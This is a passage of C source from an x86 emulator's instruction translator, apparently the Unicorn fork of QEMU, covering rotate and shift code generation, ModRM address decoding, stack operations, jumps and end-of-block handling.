tcg_ctx->cpu_cc_dst, tcg_ctx->cpu_cc_dst, 1); } else { tcg_gen_shri_tl(tcg_ctx, tcg_ctx->cpu_cc_src2, s->T0, mask); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, s->T0, 1); } tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_cc_src2, tcg_ctx->cpu_cc_src2, 1); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_cc_src2, tcg_ctx->cpu_cc_src2, tcg_ctx->cpu_cc_dst); /* Now conditionally store the new CC_OP value. If the shift count is 0 we keep the CC_OP_EFLAGS setting so that only CC_SRC is live. Otherwise reuse CC_OP_ADCOX which have the C and O flags split out exactly as we computed above. */ t0 = tcg_const_i32(tcg_ctx, 0); t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t1, s->T1); tcg_gen_movi_i32(tcg_ctx, s->tmp2_i32, CC_OP_ADCOX); tcg_gen_movi_i32(tcg_ctx, s->tmp3_i32, CC_OP_EFLAGS); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_NE, tcg_ctx->cpu_cc_op, t1, t0, s->tmp2_i32, s->tmp3_i32); tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); /* The CC_OP value is no longer predictable. */ set_cc_op(s, CC_OP_DYNAMIC); } static void gen_rot_rm_im(DisasContext *s, MemOp ot, int op1, int op2, int is_right) { TCGContext *tcg_ctx = s->uc->tcg_ctx; int mask = (ot == MO_64 ? 0x3f : 0x1f); int shift; /* load */ if (op1 == OR_TMP0) { gen_op_ld_v(s, ot, s->T0, s->A0); } else { gen_op_mov_v_reg(s, ot, s->T0, op1); } op2 &= mask; if (op2 != 0) { switch (ot) { #ifdef TARGET_X86_64 case MO_32: tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); if (is_right) { tcg_gen_rotri_i32(tcg_ctx, s->tmp2_i32, s->tmp2_i32, op2); } else { tcg_gen_rotli_i32(tcg_ctx, s->tmp2_i32, s->tmp2_i32, op2); } tcg_gen_extu_i32_tl(tcg_ctx, s->T0, s->tmp2_i32); break; #endif default: if (is_right) { tcg_gen_rotri_tl(tcg_ctx, s->T0, s->T0, op2); } else { tcg_gen_rotli_tl(tcg_ctx, s->T0, s->T0, op2); } break; case MO_8: mask = 7; goto do_shifts; case MO_16: mask = 15; do_shifts: shift = op2 & mask; if (is_right) { shift = mask + 1 - shift; } gen_extu(tcg_ctx, ot, s->T0); tcg_gen_shli_tl(tcg_ctx, s->tmp0, s->T0, shift); tcg_gen_shri_tl(tcg_ctx, s->T0, s->T0, mask + 1 - shift); tcg_gen_or_tl(tcg_ctx, s->T0, s->T0, s->tmp0); break; } } /* store */ gen_op_st_rm_T0_A0(s, ot, op1); if (op2 != 0) { /* Compute the flags into CC_SRC. */ gen_compute_eflags(s); /* The value that was "rotated out" is now present at the other end of the word. Compute C into CC_DST and O into CC_SRC2. Note that since we've computed the flags into CC_SRC, these variables are currently dead. 
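           For a left rotate, C is the new LSB and O = MSB ^ C; for a right
           rotate, C is the new MSB and O is the XOR of the two topmost
           bits, matching the architectural rotate-by-1 definition of OF.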
*/ if (is_right) { tcg_gen_shri_tl(tcg_ctx, tcg_ctx->cpu_cc_src2, s->T0, mask - 1); tcg_gen_shri_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, s->T0, mask); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, tcg_ctx->cpu_cc_dst, 1); } else { tcg_gen_shri_tl(tcg_ctx, tcg_ctx->cpu_cc_src2, s->T0, mask); tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_cc_dst, s->T0, 1); } tcg_gen_andi_tl(tcg_ctx, tcg_ctx->cpu_cc_src2, tcg_ctx->cpu_cc_src2, 1); tcg_gen_xor_tl(tcg_ctx, tcg_ctx->cpu_cc_src2, tcg_ctx->cpu_cc_src2, tcg_ctx->cpu_cc_dst); set_cc_op(s, CC_OP_ADCOX); } } /* XXX: add faster immediate = 1 case */ static void gen_rotc_rm_T1(DisasContext *s, MemOp ot, int op1, int is_right) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_compute_eflags(s); // assert(s->cc_op == CC_OP_EFLAGS); /* load */ if (op1 == OR_TMP0) gen_op_ld_v(s, ot, s->T0, s->A0); else gen_op_mov_v_reg(s, ot, s->T0, op1); if (is_right) { switch (ot) { case MO_8: gen_helper_rcrb(tcg_ctx, s->T0, tcg_ctx->cpu_env, s->T0, s->T1); break; case MO_16: gen_helper_rcrw(tcg_ctx, s->T0, tcg_ctx->cpu_env, s->T0, s->T1); break; case MO_32: gen_helper_rcrl(tcg_ctx, s->T0, tcg_ctx->cpu_env, s->T0, s->T1); break; #ifdef TARGET_X86_64 case MO_64: gen_helper_rcrq(tcg_ctx, s->T0, tcg_ctx->cpu_env, s->T0, s->T1); break; #endif default: tcg_abort(); } } else { switch (ot) { case MO_8: gen_helper_rclb(tcg_ctx, s->T0, tcg_ctx->cpu_env, s->T0, s->T1); break; case MO_16: gen_helper_rclw(tcg_ctx, s->T0, tcg_ctx->cpu_env, s->T0, s->T1); break; case MO_32: gen_helper_rcll(tcg_ctx, s->T0, tcg_ctx->cpu_env, s->T0, s->T1); break; #ifdef TARGET_X86_64 case MO_64: gen_helper_rclq(tcg_ctx, s->T0, tcg_ctx->cpu_env, s->T0, s->T1); break; #endif default: tcg_abort(); } } /* store */ gen_op_st_rm_T0_A0(s, ot, op1); } /* XXX: add faster immediate case */ static void gen_shiftd_rm_T1(DisasContext *s, MemOp ot, int op1, bool is_right, TCGv count_in) { TCGContext *tcg_ctx = s->uc->tcg_ctx; target_ulong mask = (ot == MO_64 ? 63 : 31); TCGv count; /* load */ if (op1 == OR_TMP0) { gen_op_ld_v(s, ot, s->T0, s->A0); } else { gen_op_mov_v_reg(s, ot, s->T0, op1); } count = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, count, count_in, mask); switch (ot) { case MO_16: /* Note: we implement the Intel behaviour for shift count > 16. This means "shrdw C, B, A" shifts A:B:A >> C. Build the B:A portion by constructing it as a 32-bit value. */ if (is_right) { tcg_gen_deposit_tl(tcg_ctx, s->tmp0, s->T0, s->T1, 16, 16); tcg_gen_mov_tl(tcg_ctx, s->T1, s->T0); tcg_gen_mov_tl(tcg_ctx, s->T0, s->tmp0); } else { tcg_gen_deposit_tl(tcg_ctx, s->T1, s->T0, s->T1, 16, 16); } /* FALLTHRU */ #ifdef TARGET_X86_64 case MO_32: /* Concatenate the two 32-bit values and use a 64-bit shift. 
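           For SHRD the pair is built as T1:T0 and the low half is kept
           after the right shift; for SHLD it is built as T0:T1 and the
           high half is extracted by the final shift right by 32.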
*/ tcg_gen_subi_tl(tcg_ctx, s->tmp0, count, 1); if (is_right) { tcg_gen_concat_tl_i64(tcg_ctx, s->T0, s->T0, s->T1); tcg_gen_shr_i64(tcg_ctx, s->tmp0, s->T0, s->tmp0); tcg_gen_shr_i64(tcg_ctx, s->T0, s->T0, count); } else { tcg_gen_concat_tl_i64(tcg_ctx, s->T0, s->T1, s->T0); tcg_gen_shl_i64(tcg_ctx, s->tmp0, s->T0, s->tmp0); tcg_gen_shl_i64(tcg_ctx, s->T0, s->T0, count); tcg_gen_shri_i64(tcg_ctx, s->tmp0, s->tmp0, 32); tcg_gen_shri_i64(tcg_ctx, s->T0, s->T0, 32); } break; #endif default: tcg_gen_subi_tl(tcg_ctx, s->tmp0, count, 1); if (is_right) { tcg_gen_shr_tl(tcg_ctx, s->tmp0, s->T0, s->tmp0); tcg_gen_subfi_tl(tcg_ctx, s->tmp4, mask + 1, count); tcg_gen_shr_tl(tcg_ctx, s->T0, s->T0, count); tcg_gen_shl_tl(tcg_ctx, s->T1, s->T1, s->tmp4); } else { tcg_gen_shl_tl(tcg_ctx, s->tmp0, s->T0, s->tmp0); if (ot == MO_16) { /* Only needed if count > 16, for Intel behaviour. */ tcg_gen_subfi_tl(tcg_ctx, s->tmp4, 33, count); tcg_gen_shr_tl(tcg_ctx, s->tmp4, s->T1, s->tmp4); tcg_gen_or_tl(tcg_ctx, s->tmp0, s->tmp0, s->tmp4); } tcg_gen_subfi_tl(tcg_ctx, s->tmp4, mask + 1, count); tcg_gen_shl_tl(tcg_ctx, s->T0, s->T0, count); tcg_gen_shr_tl(tcg_ctx, s->T1, s->T1, s->tmp4); } tcg_gen_movi_tl(tcg_ctx, s->tmp4, 0); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_EQ, s->T1, count, s->tmp4, s->tmp4, s->T1); tcg_gen_or_tl(tcg_ctx, s->T0, s->T0, s->T1); break; } /* store */ gen_op_st_rm_T0_A0(s, ot, op1); gen_shift_flags(s, ot, s->T0, s->tmp0, count, is_right); tcg_temp_free(tcg_ctx, count); } static void gen_shift(DisasContext *s1, int op, MemOp ot, int d, int s) { if (s != OR_TMP1) gen_op_mov_v_reg(s1, ot, s1->T1, s); switch(op) { case OP_ROL: gen_rot_rm_T1(s1, ot, d, 0); break; case OP_ROR: gen_rot_rm_T1(s1, ot, d, 1); break; case OP_SHL: case OP_SHL1: gen_shift_rm_T1(s1, ot, d, 0, 0); break; case OP_SHR: gen_shift_rm_T1(s1, ot, d, 1, 0); break; case OP_SAR: gen_shift_rm_T1(s1, ot, d, 1, 1); break; case OP_RCL: gen_rotc_rm_T1(s1, ot, d, 0); break; case OP_RCR: gen_rotc_rm_T1(s1, ot, d, 1); break; } } static void gen_shifti(DisasContext *s1, int op, MemOp ot, int d, int c) { TCGContext *tcg_ctx = s1->uc->tcg_ctx; switch(op) { case OP_ROL: gen_rot_rm_im(s1, ot, d, c, 0); break; case OP_ROR: gen_rot_rm_im(s1, ot, d, c, 1); break; case OP_SHL: case OP_SHL1: gen_shift_rm_im(s1, ot, d, c, 0, 0); break; case OP_SHR: gen_shift_rm_im(s1, ot, d, c, 1, 0); break; case OP_SAR: gen_shift_rm_im(s1, ot, d, c, 1, 1); break; default: /* currently not optimized */ tcg_gen_movi_tl(tcg_ctx, s1->T1, c); gen_shift(s1, op, ot, d, OR_TMP1); break; } } #define X86_MAX_INSN_LENGTH 15 static uint64_t advance_pc(CPUX86State *env, DisasContext *s, int num_bytes) { uint64_t pc = s->pc; s->pc += num_bytes; if (unlikely(s->pc - s->pc_start > X86_MAX_INSN_LENGTH)) { /* If the instruction's 16th byte is on a different page than the 1st, a * page fault on the second page wins over the general protection fault * caused by the instruction being too long. * This can happen even if the operand is only one byte long! 
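         * The dummy byte load below touches the first byte of the second
         * page only to provoke that #PF; the loaded value is discarded.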
*/ if (((s->pc - 1) ^ (pc - 1)) & TARGET_PAGE_MASK) { volatile uint8_t unused = cpu_ldub_code(env, (s->pc - 1) & TARGET_PAGE_MASK); (void) unused; } siglongjmp(s->jmpbuf, 1); } return pc; } static inline uint8_t x86_ldub_code(CPUX86State *env, DisasContext *s) { return translator_ldub(env->uc->tcg_ctx, env, advance_pc(env, s, 1)); } static inline int16_t x86_ldsw_code(CPUX86State *env, DisasContext *s) { return translator_ldsw(env->uc->tcg_ctx, env, advance_pc(env, s, 2)); } static inline uint16_t x86_lduw_code(CPUX86State *env, DisasContext *s) { return translator_lduw(env->uc->tcg_ctx, env, advance_pc(env, s, 2)); } static inline uint32_t x86_ldl_code(CPUX86State *env, DisasContext *s) { return translator_ldl(env->uc->tcg_ctx, env, advance_pc(env, s, 4)); } #ifdef TARGET_X86_64 static inline uint64_t x86_ldq_code(CPUX86State *env, DisasContext *s) { return translator_ldq(env->uc->tcg_ctx, env, advance_pc(env, s, 8)); } #endif /* Decompose an address. */ typedef struct AddressParts { int def_seg; int base; int index; int scale; target_long disp; } AddressParts; static AddressParts gen_lea_modrm_0(CPUX86State *env, DisasContext *s, int modrm) { int def_seg, base, index, scale, mod, rm; target_long disp; bool havesib; def_seg = R_DS; index = -1; scale = 0; disp = 0; mod = (modrm >> 6) & 3; rm = modrm & 7; base = rm | REX_B(s); if (mod == 3) { /* Normally filtered out earlier, but including this path simplifies multi-byte nop, as well as bndcl, bndcu, bndcn. */ goto done; } switch (s->aflag) { case MO_64: case MO_32: havesib = 0; if (rm == 4) { int code = x86_ldub_code(env, s); scale = (code >> 6) & 3; index = ((code >> 3) & 7) | REX_X(s); if (index == 4) { index = -1; /* no index */ } base = (code & 7) | REX_B(s); havesib = 1; } switch (mod) { case 0: if ((base & 7) == 5) { base = -1; disp = (int32_t)x86_ldl_code(env, s); if (CODE64(s) && !havesib) { base = -2; disp += s->pc + s->rip_offset; } } break; case 1: disp = (int8_t)x86_ldub_code(env, s); break; default: case 2: disp = (int32_t)x86_ldl_code(env, s); break; } /* For correct popl handling with esp. */ if (base == R_ESP && s->popl_esp_hack) { disp += s->popl_esp_hack; } if (base == R_EBP || base == R_ESP) { def_seg = R_SS; } break; case MO_16: if (mod == 0) { if (rm == 6) { base = -1; disp = x86_lduw_code(env, s); break; } } else if (mod == 1) { disp = (int8_t)x86_ldub_code(env, s); } else { disp = (int16_t)x86_lduw_code(env, s); } switch (rm) { case 0: base = R_EBX; index = R_ESI; break; case 1: base = R_EBX; index = R_EDI; break; case 2: base = R_EBP; index = R_ESI; def_seg = R_SS; break; case 3: base = R_EBP; index = R_EDI; def_seg = R_SS; break; case 4: base = R_ESI; break; case 5: base = R_EDI; break; case 6: base = R_EBP; def_seg = R_SS; break; default: case 7: base = R_EBX; break; } break; default: tcg_abort(); } done: return (AddressParts){ def_seg, base, index, scale, disp }; } /* Compute the address, with a minimum number of TCG ops. 
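   When no arithmetic is needed the guest register TCGv is returned
   directly, so callers must treat the result as read-only; s->A0 is used
   as scratch whenever a sum or a displacement must be materialized.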
*/ static TCGv gen_lea_modrm_1(DisasContext *s, AddressParts a) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv ea = NULL; if (a.index >= 0) { if (a.scale == 0) { ea = tcg_ctx->cpu_regs[a.index]; } else { tcg_gen_shli_tl(tcg_ctx, s->A0, tcg_ctx->cpu_regs[a.index], a.scale); ea = s->A0; } if (a.base >= 0) { tcg_gen_add_tl(tcg_ctx, s->A0, ea, tcg_ctx->cpu_regs[a.base]); ea = s->A0; } } else if (a.base >= 0) { ea = tcg_ctx->cpu_regs[a.base]; } if (!ea) { tcg_gen_movi_tl(tcg_ctx, s->A0, a.disp); ea = s->A0; } else if (a.disp != 0) { tcg_gen_addi_tl(tcg_ctx, s->A0, ea, a.disp); ea = s->A0; } return ea; } static void gen_lea_modrm(CPUX86State *env, DisasContext *s, int modrm) { AddressParts a = gen_lea_modrm_0(env, s, modrm); TCGv ea = gen_lea_modrm_1(s, a); gen_lea_v_seg(s, s->aflag, ea, a.def_seg, s->override); } static void gen_nop_modrm(CPUX86State *env, DisasContext *s, int modrm) { (void)gen_lea_modrm_0(env, s, modrm); } /* Used for BNDCL, BNDCU, BNDCN. */ static void gen_bndck(CPUX86State *env, DisasContext *s, int modrm, TCGCond cond, TCGv_i64 bndv) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv ea = gen_lea_modrm_1(s, gen_lea_modrm_0(env, s, modrm)); tcg_gen_extu_tl_i64(tcg_ctx, s->tmp1_i64, ea); if (!CODE64(s)) { tcg_gen_ext32u_i64(tcg_ctx, s->tmp1_i64, s->tmp1_i64); } tcg_gen_setcond_i64(tcg_ctx, cond, s->tmp1_i64, s->tmp1_i64, bndv); tcg_gen_extrl_i64_i32(tcg_ctx, s->tmp2_i32, s->tmp1_i64); gen_helper_bndck(tcg_ctx, tcg_ctx->cpu_env, s->tmp2_i32); } /* used for LEA and MOV AX, mem */ static void gen_add_A0_ds_seg(DisasContext *s) { gen_lea_v_seg(s, s->aflag, s->A0, R_DS, s->override); } /* generate modrm memory load or store of 'reg'. TMP0 is used if reg == OR_TMP0 */ static void gen_ldst_modrm(CPUX86State *env, DisasContext *s, int modrm, MemOp ot, int reg, int is_store) { int mod, rm; mod = (modrm >> 6) & 3; rm = (modrm & 7) | REX_B(s); if (mod == 3) { if (is_store) { if (reg != OR_TMP0) gen_op_mov_v_reg(s, ot, s->T0, reg); gen_op_mov_reg_v(s, ot, rm, s->T0); } else { gen_op_mov_v_reg(s, ot, s->T0, rm); if (reg != OR_TMP0) gen_op_mov_reg_v(s, ot, reg, s->T0); } } else { gen_lea_modrm(env, s, modrm); if (is_store) { if (reg != OR_TMP0) gen_op_mov_v_reg(s, ot, s->T0, reg); gen_op_st_v(s, ot, s->T0, s->A0); } else { gen_op_ld_v(s, ot, s->T0, s->A0); if (reg != OR_TMP0) gen_op_mov_reg_v(s, ot, reg, s->T0); } } } static inline uint32_t insn_get(CPUX86State *env, DisasContext *s, MemOp ot) { uint32_t ret; switch (ot) { case MO_8: ret = x86_ldub_code(env, s); break; case MO_16: ret = x86_lduw_code(env, s); break; case MO_32: #ifdef TARGET_X86_64 case MO_64: #endif ret = x86_ldl_code(env, s); break; default: tcg_abort(); } return ret; } static inline int insn_const_size(MemOp ot) { if (ot <= MO_32) { return 1 << ot; } else { return 4; } } static inline bool use_goto_tb(DisasContext *s, target_ulong pc) { return (pc & TARGET_PAGE_MASK) == (s->base.tb->pc & TARGET_PAGE_MASK) || (pc & TARGET_PAGE_MASK) == (s->pc_start & TARGET_PAGE_MASK); } static inline void gen_goto_tb(DisasContext *s, int tb_num, target_ulong eip) { TCGContext *tcg_ctx = s->uc->tcg_ctx; target_ulong pc = s->cs_base + eip; if (use_goto_tb(s, pc)) { /* jump to same page: we can use a direct jump */ tcg_gen_goto_tb(tcg_ctx, tb_num); gen_jmp_im(s, eip); tcg_gen_exit_tb(tcg_ctx, s->base.tb, tb_num); s->base.is_jmp = DISAS_NORETURN; } else { /* jump to another page */ gen_jmp_im(s, eip); gen_jr(s, s->tmp0); } } static inline void gen_jcc(DisasContext *s, int b, target_ulong val, target_ulong next_eip) { TCGContext *tcg_ctx = 
s->uc->tcg_ctx; TCGLabel *l1, *l2; if (s->jmp_opt) { l1 = gen_new_label(tcg_ctx); gen_jcc1(s, b, l1); gen_goto_tb(s, 0, next_eip); gen_set_label(tcg_ctx, l1); gen_goto_tb(s, 1, val); } else { l1 = gen_new_label(tcg_ctx); l2 = gen_new_label(tcg_ctx); gen_jcc1(s, b, l1); gen_jmp_im(s, next_eip); tcg_gen_br(tcg_ctx, l2); gen_set_label(tcg_ctx, l1); gen_jmp_im(s, val); gen_set_label(tcg_ctx, l2); gen_eob(s); } } static void gen_cmovcc1(CPUX86State *env, DisasContext *s, MemOp ot, int b, int modrm, int reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; CCPrepare cc; gen_ldst_modrm(env, s, modrm, ot, OR_TMP0, 0); cc = gen_prepare_cc(s, b, s->T1); if (cc.mask != -1) { TCGv t0 = tcg_temp_new(tcg_ctx); tcg_gen_andi_tl(tcg_ctx, t0, cc.reg, cc.mask); cc.reg = t0; } if (!cc.use_reg2) { cc.reg2 = tcg_const_tl(tcg_ctx, cc.imm); } tcg_gen_movcond_tl(tcg_ctx, cc.cond, s->T0, cc.reg, cc.reg2, s->T0, tcg_ctx->cpu_regs[reg]); gen_op_mov_reg_v(s, ot, reg, s->T0); if (cc.mask != -1) { tcg_temp_free(tcg_ctx, cc.reg); } if (!cc.use_reg2) { tcg_temp_free(tcg_ctx, cc.reg2); } } static inline void gen_op_movl_T0_seg(DisasContext *s, int seg_reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_ld32u_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State,segs[seg_reg].selector)); } static inline void gen_op_movl_seg_T0_vm(DisasContext *s, int seg_reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; tcg_gen_ext16u_tl(tcg_ctx, s->T0, s->T0); tcg_gen_st32_tl(tcg_ctx, s->T0, tcg_ctx->cpu_env, offsetof(CPUX86State,segs[seg_reg].selector)); tcg_gen_shli_tl(tcg_ctx, tcg_ctx->cpu_seg_base[seg_reg], s->T0, 4); } /* move T0 to seg_reg and compute if the CPU state may change. Never call this function with seg_reg == R_CS */ static void gen_movl_seg_T0(DisasContext *s, int seg_reg) { TCGContext *tcg_ctx = s->uc->tcg_ctx; if (s->pe && !s->vm86) { tcg_gen_trunc_tl_i32(tcg_ctx, s->tmp2_i32, s->T0); gen_helper_load_seg(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, seg_reg), s->tmp2_i32); /* abort translation because the addseg value may change or because ss32 may change. For R_SS, translation must always stop as a special handling must be done to disable hardware interrupts for the next instruction */ if (seg_reg == R_SS || (s->code32 && seg_reg < R_FS)) { s->base.is_jmp = DISAS_TOO_MANY; } } else { gen_op_movl_seg_T0_vm(s, seg_reg); if (seg_reg == R_SS) { s->base.is_jmp = DISAS_TOO_MANY; } } } static inline int svm_is_rep(int prefixes) { return ((prefixes & (PREFIX_REPZ | PREFIX_REPNZ)) ? 8 : 0); } static inline void gen_svm_check_intercept_param(DisasContext *s, target_ulong pc_start, uint32_t type, uint64_t param) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* no SVM activated; fast case */ if (likely(!(s->flags & HF_GUEST_MASK))) return; gen_update_cc_op(s); gen_jmp_im(s, pc_start - s->cs_base); gen_helper_svm_check_intercept_param(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, type), tcg_const_i64(tcg_ctx, param)); } static inline void gen_svm_check_intercept(DisasContext *s, target_ulong pc_start, uint64_t type) { gen_svm_check_intercept_param(s, pc_start, type, 0); } static inline void gen_stack_update(DisasContext *s, int addend) { gen_op_add_reg_im(s, mo_stacksize(s), R_ESP, addend); } /* Generate a push. It depends on ss32, addseg and dflag. 
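   The decremented stack pointer is computed into A0 first and ESP is only
   written back after the store succeeds, so a faulting push leaves ESP
   unchanged and the instruction can be restarted precisely.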
*/ static void gen_push_v(DisasContext *s, TCGv val) { TCGContext *tcg_ctx = s->uc->tcg_ctx; MemOp d_ot = mo_pushpop(s, s->dflag); MemOp a_ot = mo_stacksize(s); int size = 1 << d_ot; TCGv new_esp = s->A0; tcg_gen_subi_tl(tcg_ctx, s->A0, tcg_ctx->cpu_regs[R_ESP], size); if (!CODE64(s)) { if (s->addseg) { new_esp = s->tmp4; tcg_gen_mov_tl(tcg_ctx, new_esp, s->A0); } gen_lea_v_seg(s, a_ot, s->A0, R_SS, -1); } gen_op_st_v(s, d_ot, val, s->A0); gen_op_mov_reg_v(s, a_ot, R_ESP, new_esp); } /* two step pop is necessary for precise exceptions */ static MemOp gen_pop_T0(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; MemOp d_ot = mo_pushpop(s, s->dflag); gen_lea_v_seg(s, mo_stacksize(s), tcg_ctx->cpu_regs[R_ESP], R_SS, -1); gen_op_ld_v(s, d_ot, s->T0, s->A0); return d_ot; } static inline void gen_pop_update(DisasContext *s, MemOp ot) { gen_stack_update(s, 1 << ot); } static inline void gen_stack_A0(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_lea_v_seg(s, s->ss32 ? MO_32 : MO_16, tcg_ctx->cpu_regs[R_ESP], R_SS, -1); } static void gen_pusha(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; MemOp s_ot = s->ss32 ? MO_32 : MO_16; MemOp d_ot = s->dflag; int size = 1 << d_ot; int i; for (i = 0; i < 8; i++) { tcg_gen_addi_tl(tcg_ctx, s->A0, tcg_ctx->cpu_regs[R_ESP], (i - 8) * size); gen_lea_v_seg(s, s_ot, s->A0, R_SS, -1); gen_op_st_v(s, d_ot, tcg_ctx->cpu_regs[7 - i], s->A0); } gen_stack_update(s, -8 * size); } static void gen_popa(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; MemOp s_ot = s->ss32 ? MO_32 : MO_16; MemOp d_ot = s->dflag; int size = 1 << d_ot; int i; for (i = 0; i < 8; i++) { /* ESP is not reloaded */ if (7 - i == R_ESP) { continue; } tcg_gen_addi_tl(tcg_ctx, s->A0, tcg_ctx->cpu_regs[R_ESP], i * size); gen_lea_v_seg(s, s_ot, s->A0, R_SS, -1); gen_op_ld_v(s, d_ot, s->T0, s->A0); gen_op_mov_reg_v(s, d_ot, 7 - i, s->T0); } gen_stack_update(s, 8 * size); } static void gen_enter(DisasContext *s, int esp_addend, int level) { TCGContext *tcg_ctx = s->uc->tcg_ctx; MemOp d_ot = mo_pushpop(s, s->dflag); MemOp a_ot = CODE64(s) ? MO_64 : s->ss32 ? MO_32 : MO_16; int size = 1 << d_ot; /* Push BP; compute FrameTemp into T1. */ tcg_gen_subi_tl(tcg_ctx, s->T1, tcg_ctx->cpu_regs[R_ESP], size); gen_lea_v_seg(s, a_ot, s->T1, R_SS, -1); gen_op_st_v(s, d_ot, tcg_ctx->cpu_regs[R_EBP], s->A0); level &= 31; if (level != 0) { int i; /* Copy level-1 pointers from the previous frame. */ for (i = 1; i < level; ++i) { tcg_gen_subi_tl(tcg_ctx, s->A0, tcg_ctx->cpu_regs[R_EBP], size * i); gen_lea_v_seg(s, a_ot, s->A0, R_SS, -1); gen_op_ld_v(s, d_ot, s->tmp0, s->A0); tcg_gen_subi_tl(tcg_ctx, s->A0, s->T1, size * i); gen_lea_v_seg(s, a_ot, s->A0, R_SS, -1); gen_op_st_v(s, d_ot, s->tmp0, s->A0); } /* Push the current FrameTemp as the last level. */ tcg_gen_subi_tl(tcg_ctx, s->A0, s->T1, size * level); gen_lea_v_seg(s, a_ot, s->A0, R_SS, -1); gen_op_st_v(s, d_ot, s->T1, s->A0); } /* Copy the FrameTemp value to EBP. */ gen_op_mov_reg_v(s, a_ot, R_EBP, s->T1); /* Compute the final value of ESP. 
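      Per the ENTER pseudo-code this is FrameTemp - esp_addend - size * level,
      with T1 still holding FrameTemp here.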
*/ tcg_gen_subi_tl(tcg_ctx, s->T1, s->T1, esp_addend + size * level); gen_op_mov_reg_v(s, a_ot, R_ESP, s->T1); } static void gen_leave(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; MemOp d_ot = mo_pushpop(s, s->dflag); MemOp a_ot = mo_stacksize(s); gen_lea_v_seg(s, a_ot, tcg_ctx->cpu_regs[R_EBP], R_SS, -1); gen_op_ld_v(s, d_ot, s->T0, s->A0); tcg_gen_addi_tl(tcg_ctx, s->T1, tcg_ctx->cpu_regs[R_EBP], 1ULL << d_ot); gen_op_mov_reg_v(s, d_ot, R_EBP, s->T0); gen_op_mov_reg_v(s, a_ot, R_ESP, s->T1); } /* Similarly, except that the assumption here is that we don't decode the instruction at all -- either a missing opcode, an unimplemented feature, or just a bogus instruction stream. */ static void gen_unknown_opcode(CPUX86State *env, DisasContext *s) { gen_illegal_opcode(s); } /* an interrupt is different from an exception because of the privilege checks */ static void gen_interrupt(DisasContext *s, int intno, target_ulong cur_eip, target_ulong next_eip) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_update_cc_op(s); gen_jmp_im(s, cur_eip); gen_helper_raise_interrupt(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, intno), tcg_const_i32(tcg_ctx, next_eip - cur_eip)); s->base.is_jmp = DISAS_NORETURN; } static void gen_debug(DisasContext *s, target_ulong cur_eip) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_update_cc_op(s); gen_jmp_im(s, cur_eip); gen_helper_debug(tcg_ctx, tcg_ctx->cpu_env); s->base.is_jmp = DISAS_NORETURN; } static void gen_set_hflag(DisasContext *s, uint32_t mask) { if ((s->flags & mask) == 0) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t = tcg_temp_new_i32(tcg_ctx); tcg_gen_ld_i32(tcg_ctx, t, tcg_ctx->cpu_env, offsetof(CPUX86State, hflags)); tcg_gen_ori_i32(tcg_ctx, t, t, mask); tcg_gen_st_i32(tcg_ctx, t, tcg_ctx->cpu_env, offsetof(CPUX86State, hflags)); tcg_temp_free_i32(tcg_ctx, t); s->flags |= mask; } } static void gen_reset_hflag(DisasContext *s, uint32_t mask) { if (s->flags & mask) { TCGContext *tcg_ctx = s->uc->tcg_ctx; TCGv_i32 t = tcg_temp_new_i32(tcg_ctx); tcg_gen_ld_i32(tcg_ctx, t, tcg_ctx->cpu_env, offsetof(CPUX86State, hflags)); tcg_gen_andi_i32(tcg_ctx, t, t, ~mask); tcg_gen_st_i32(tcg_ctx, t, tcg_ctx->cpu_env, offsetof(CPUX86State, hflags)); tcg_temp_free_i32(tcg_ctx, t); s->flags &= ~mask; } } /* Clear BND registers during legacy branches. */ static void gen_bnd_jmp(DisasContext *s) { TCGContext *tcg_ctx = s->uc->tcg_ctx; /* Clear the registers only if BND prefix is missing, MPX is enabled, and if the BNDREGs are known to be in use (non-zero) already. The helper itself will check BNDPRESERVE at runtime. */ if ((s->prefix & PREFIX_REPNZ) == 0 && (s->flags & HF_MPX_EN_MASK) != 0 && (s->flags & HF_MPX_IU_MASK) != 0) { gen_helper_bnd_jmp(tcg_ctx, tcg_ctx->cpu_env); } } /* Generate an end of block. Trace exception is also generated if needed. If INHIBIT, set HF_INHIBIT_IRQ_MASK if it isn't already set. If RECHECK_TF, emit a rechecking helper for #DB, ignoring the state of S->TF. This is used by the syscall/sysret insns. */ static void do_gen_eob_worker(DisasContext *s, bool inhibit, bool recheck_tf, bool jr) { TCGContext *tcg_ctx = s->uc->tcg_ctx; gen_update_cc_op(s); /* If several instructions disable interrupts, only the first does it. 
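       HF_INHIBIT_IRQ_MASK is set only when it was previously clear and is
       cleared otherwise, so the interrupt shadow lasts for exactly one
       instruction.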
